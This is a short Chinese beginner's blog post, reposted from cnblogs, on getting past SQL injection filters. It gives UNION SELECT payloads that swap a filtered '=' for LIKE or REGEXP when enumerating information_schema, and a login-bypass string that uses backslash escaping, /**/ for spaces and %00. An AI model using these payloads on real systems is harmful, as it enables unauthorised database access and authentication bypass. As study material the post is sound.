首先,虽然本人是小白,但是太过基础的sql注入问题也就不再重复的解释了。直接从常用的说起。
本文参考博客:https://www.cnblogs.com/milantgh/p/4274387.html
对我这个小白来说这是一篇很好的博客。
(1) 对于过滤了 '=' 的sql注入 ,有两个方法可以绕过,like 和 regexp。 即
id=1'+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema=database()#
id=1'+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema+like+database()#
id=1'+union+select+1,group_concat(schema_table)+from+information_schema.tables+where+table_schema+regexp+database()#
三者是相等的。(regexp就是正则表达式的意思o,在某些情况下,可以用 username='\'&password='||password/**/regexp/**/"^a";%00'来绕过,注:/**/是用来代替空格的,;%00是用来闭合单引号的)
(2)明天再写。。。
来源:博客园
作者:cioi
链接:https://www.cnblogs.com/cioi/p/11626250.html